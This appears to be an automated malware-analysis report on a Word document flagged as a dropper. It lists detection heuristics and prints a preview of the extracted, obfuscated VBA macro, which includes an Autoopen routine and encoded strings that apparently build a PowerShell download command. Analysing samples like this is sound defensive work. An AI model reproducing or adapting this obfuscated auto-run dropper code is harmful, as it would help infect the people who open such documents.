MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Word document containing a legacy WordBasic Autoopen macro. The presence of a critical 'Shell()' call firing indicates that the macro is designed to execute arbitrary commands. This is further supported by the ClamAV detection name 'Doc.Dropper.Agent-6549967-0', suggesting a dropper functionality. The macro's intent is likely to download and execute a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6549967-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6549967-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 163047 bytes |
SHA-256: 58e2a1532be3f7f489a82b6ff68c885fc8c9814fbb64c4c2f0388480d7c0d343 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "fAudaNQtwjAN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub GNvKzs(RjDZO)
LDJYZo = KqwEK
JkESUB = (wpGfz / NVzqQO / 43957 / Fix(iZDTI)) + 30411 - CLng(WPRrzS + CLng(66330)) + NOiYz + 59457 * zdbvb - CStr(73279) / zjpoH / CLng(LAwLlW)
End Sub
Sub apozLi(kchqZ)
JcZsNo = JQkCL
DFMPX = (bCvIpd / whcXzw / 28345 / Fix(ViaGw)) + 95027 - CLng(SJEmm + CLng(2612)) + wXNKDw + 80958 * UkPdr - CStr(52276) / slDwvh / CLng(lJYpN)
lDDriV = EKovQY
OqrUG = (lRSjpF / cmDlOk / 11452 / Fix(QhXvVs)) + 53915 - CLng(wHjXZI + CLng(90164)) + DjbwU + 71191 * BccGS - CStr(12218) / jjShw / CLng(TZktJ)
VbJiUU = lifIHG
NWTslJ = (tbAErK / ziwhom / 28896 / Fix(ruImaU)) + 40343 - CLng(XKaSw + CLng(92772)) + rIAFc + 79 * dcJGm - CStr(7077) / bTTQUf / CLng(kwiHY)
End Sub
Sub ctQro(YHZoj)
shQjcU = RVvrGC
QhHJRw = (ahjLS / jfZBf / 75803 / Fix(bwIDWO)) + 49259 - CLng(EhCKp + CLng(24120)) + rzPWij + 35111 * jVKDw - CStr(72865) / tLTYAR / CLng(DnDYv)
zhBdE = oZmIFu
wbiLK = (VInqqQ / USwcT / 18413 / Fix(vAzUhw)) + 1458 - CLng(WHDOir + CLng(36915)) + VbszaO + 24343 * KMtcWd - CStr(17930) / vHNwcO / CLng(MaYlfn)
End Sub
Sub Autoopen()
On Error Resume Next
mUBUbB = MMhnIJ
FXbtw = (SXiUV / wfWCc / 63728 / Fix(iZZbB)) + 4305 - CLng(NjufL + CLng(37720)) + KHCws + 63597 * JPpjz - CStr(39028) / vpKFG / CLng(bujwa)
BdavSDEhcBK (qAjdwJ + WFlMvSYinoOukk + CmYTF)
AiYKju = hCRtj
EOdPaG = (BqYam / WwRTXV / 9490 / Fix(GaCkw)) + 2357 - CLng(Ioipt + CLng(47763)) + mZWzN + 67229 * JFwYsX - CStr(5620) / juYiE / CLng(nafiFz)
End Sub
Sub CpksRS(swZIV)
wUDLDd = sEnRO
GzwrT = (koHQO / aFrXmV / 30013 / Fix(QBTXT)) + 50211 - CLng(cAzCSd + CLng(94854)) + MuFFA + 71143 * pEofdX - CStr(58461) / SSCGE / CLng(fbXtf)
oKOvC = uidhQP
QMOio = (EzifjQ / tGjSi / 22742 / Fix(cKfqt)) + 56294 - CLng(czskBm + CLng(66582)) + rRsiwa + 21073 * iifik - CStr(75798) / KwEuvF / CLng(XpLzcw)
uidoFP = azPuR
AMNwO = (Bimzsn / KtDXww / 24332 / Fix(kvBqf)) + 46613 - CLng(kzpAiE + CLng(64134)) + bMimz + 7212 * kkBXF - CStr(40489) / cQvEd / CLng(QMIjR)
End Sub
Sub wnIsJ(cicKQM)
TcLQo = TONWY
ZbRuO = (zVfFV / rsucmu / 33402 / Fix(jpJoF)) + 92114 - CLng(cwDkQ + CLng(68425)) + jCLoNG + 32430 * jOGjYw - CStr(24819) / cTFYVk / CLng(dpSkW)
End Sub
Attribute VB_Name = "cUFsDJsQwj"
Sub jsFvh(XXPHa)
KLSzk = zuVtTH
BqUmUZ = (muodfW / SvNHQB / 6742 / Fix(hlJHiw)) + 73819 - CLng(pYwBfj + CLng(4672)) + uhwiQW + 78671 * OmjwH - CStr(73599) / FqHIj / CLng(MrfAEz)
End Sub
Function WFlMvSYinoOukk()
On Error Resume Next
jVQmt = MiEZiL
ptwSnh = (UsKYX / HipRi / 22395 / Fix(jntVu)) + 10352 - CLng(ZUBRcz + CLng(75322)) + SuNMWw + 70379 * KrPaVi - CStr(86181) / uSoMCA / CLng(YiCdzq)
hzrSN = Tkswf
JAARj = (aMGOLF / wwSnw / 40024 / Fix(NUoopN)) + 19229 - CLng(uQJzDk + CLng(95406)) + WilFw + 39760 * SlmzR - CStr(48806) / wtirG / CLng(MLbTjw)
PRsEDz = YLKzT("pFl'eilwe6+we6Cbwe6+we6eWwe6+we6.we6+we6twe6+we6'+'eN.we6+we6mwe6+we6ewe'+'6+we6tsyS )qxotcejbo-we6+we6qx'+'owe6+we6+we6+we6qxowqwe6+we6xowe6'+'+we6+qxowe6+we6enqwe6+w'+'e6xwe6+we6o(we6+we6. we6+weLvr", 44165 + 4 - 44165, 44165 + 194 - 44165)
qFOCi = fwJNPq
CVDDNs = (uTQTL / JELDSY / 96757 / Fix(bNWjR)) + 35188 - CLng(DnfOBN + CLng(72793)) + HXFnwW + 44395 * vrDpbl - CStr(10658) / qspbIj / CLng(waJqj)
KDkICS = PnwWb
OvHrEJ = (sFjGwi / aHIQTQ / 13099 / Fix(ooqzPh)) + 56813 - CLng(hFBdK + CLng(38755)) + VPcfiE + 38432 * LYlsIf - CStr(64828) / LTbGT / CLng(GtwPh)
iHnWfrObq = YLKzT("mdomewe6+we6twe6+we6I-ewe6+we6qxo+qxokwe6+we6qxowe6+we6+we6+we6XZsiT", 70509 + 6 - 70509, 70509 + 61 - 70509)
AvAWG = nArlX
UJiZdp = (tzDpK / NaUJij / 37569 / Fix(RdPXP)) + 73544 - CLng(rjKZvr + CLng(73785)) + WhQIu + 76224 * wFqmt - CStr(74220) / rJEEM / CLng(fOBND)
ZJoMD = iDMSvB
GMuDj = (hiTcOZ / HVjMDi / 59098 / Fix(EhFLI)) + 88735 - CLng(mjwWD + CLng(77395)) + QaCzA + 11926 * FhamY - CStr(79692) / TzONX / CLng(Ciosaj)
zSSII
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.